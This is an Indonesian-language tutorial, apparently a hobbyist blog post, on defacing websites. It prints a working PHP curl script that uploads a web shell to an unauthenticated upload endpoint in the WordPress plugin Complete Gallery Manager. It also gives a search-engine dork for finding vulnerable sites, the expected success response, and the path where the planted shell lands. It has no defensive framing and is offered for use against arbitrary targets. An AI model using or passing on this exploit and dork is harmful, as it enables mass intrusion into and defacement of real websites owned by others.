Wkwkwk Kettemu Lgi Dengan Saya :3,Saya Akan Bagikaan Tutorial Depes Wkwkwk Oke Saya Males Nulis Kesel Broww Habis Pulang Sekolaah :3
1).Join Group Dulu
Klik Disini
2).Siapkan XAMPP
Klik Disini Lalu Tinggal Install :P
3).Buka XAMPP Truss Klik Start Apache Lalu Klik Admin
4).Klik Start => run => Ketk "cmd" muncul command prompt
Ketik "cd
\"
Terus Ketik "xampp/php"
Jgn Lupa Save Shell Dan Exploit Di xampp/php
Exploit :
<?php
$uploadfile="namashell.php";
$ch = curl_init("http://target.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Dork :
inurl:/wp-content/plugins/complete-gallery-manager/
5).Cari Target Dengan Dork Lalu Masukan Ke Exploitnya Trus Buka cmd Tadi Ketikan
php namafilekamu.php
Jika akan muncul text seperti ini :
{"success":true,"r_data":[{"name":"Full Size","url":"http:\/\/target
.com\/wp-content\/uploads\/2013\/10\/lol.php","filename":"xeno","width":null,
"height":null}]}
C:\xampp\php>
bila tidak muncul text seperti itu, berarti website tersebut tidak vuln.
tempat shell yang terupload :
http://target.com/wp-content/uploads/2013/10/shell.php